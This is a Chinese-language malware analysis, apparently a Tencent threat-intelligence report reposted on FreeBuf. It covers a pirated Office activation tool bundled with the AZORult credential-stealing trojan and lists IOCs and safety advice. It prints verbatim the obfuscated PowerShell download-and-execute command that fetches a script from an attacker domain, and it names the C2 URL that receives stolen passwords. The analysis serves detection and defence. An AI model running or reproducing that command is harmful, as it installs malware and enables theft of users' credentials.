freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

    警惕Office盗版激活工具中隐藏的远程控制木马
    2019-04-08 11:35:30
    所属地 广东省

    概述

    腾讯御见威胁情报中心检测到一款Office激活工具被捆绑传播窃取远程木马AZORult,该Office激活工具实际经过二次打包,黑客将恶意代码和正常的激活程序打包在资源文件中,当用户运行时,除了激活程序会运行,内置的Powershell恶意代码也会运行。该盗版激活工具会在后台下载远程控制木马AZORult运行,该木马会搜集敏感信息上传并对电脑进行远程控制。

    1.jpg

    黑客将Powershell脚本代码(lnk文件)和真正的激活工具程序同时藏在资源文件中,生成新的“激活工具”,目标用户运行被重新打包的激活程序时,执行恶意脚本代码的lnk文件被释放运行。

    资源文件

    资源文件中包含的lnk文件信息

    2.png

    激活工具运行时从资源文件中释放lnk文件:

    3.png

     

    Lnk文件执行恶意Powershell脚本代码:

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-Exec bypass -windo 1$wM=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal t$wM;$nXR=((New-ObjectNet.WebClient)).DownloadString('http://boundertime.ru/pps.ps1');t $nXR

     

    Lnk指向的代码下载执行Powershell脚本

    hxxp://timebound.ug/pps.ps1(或http://boundertime.ru/pps.ps1)

    4.jpg

    Powershell脚本运行时,通过FromBase64String解码出PE文件二进制数据,并写入文件C:\Users\Public\xxxx.exe,然后将其作为参数传给Process.start

    启动程序

    5.jpg

    远程控制木马AZORult

    下载的C:\Users\Public\xxxx.exe为远程控制木马AZORult,会搜集浏览器、邮箱、Skype、Telegram、Steam等软件的登录密码上传至C2地址,并接收执行返回的指令,对目标电脑进行远程控制。

    6.png

     

    发送搜集的数据至C2地址hxxp://ghjgfjhjgf.ru/index.php

    7.png

    安全建议

    1、使用正版软件,尽量不要使用激活、破解工具。

    2、不要运行来历不明的程序。

    3、使用电脑管家拦截该类木马攻击。

    8.png

    IOCs

    2fc6dd175a2288a9c2bed36969e3241d

    0c638e0c02e0d1c2a2eb7429a51e13b0

    a5898f7aae5d6212fac6447bf801ecc1

    eb5b534366f0831b3842abac17346cd5

    171a6a149d36d8be2f9d4b35c25a8ec4

    03a1845d78da4d5d40ffa6cb3892ce0c

    ca21c7ae0664b9b5dc24710b0221d4f4

    006f03b07fe27eaf4ab4a866a02dc5dd

    d343f4179b00f1f3b2ab7b942648b0c2

    10e7859d0dfabae2eebc9605e40612f2

    05861babd099e81990cfda340de5de01

    4e5b4bc27cad9891c1d11ff6ee1b3581

    82b313ceef47bf9aa18e3e0946fca773

     

    IP

    92.53.120.114

    31.177.78.16

     

    Domain

    boundertime.ru

    timebound.ug

    ghjgfjhjgf.ru

     

    URL

    hxxp://timebound.ug/pps.ps1

    hxxp://boundertime.ru/pps.ps1

    hxxp://ghjgfjhjgf.ru/index.php 


    # 远程控制木马 # 腾讯御见威胁情报 # Azorult远控木马 # office激活工具
    本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
    被以下专辑收录,发现更多精彩内容
    + 收入我的专辑
    + 加入我的收藏
    相关推荐
    • 0 文章数
    • 0 关注者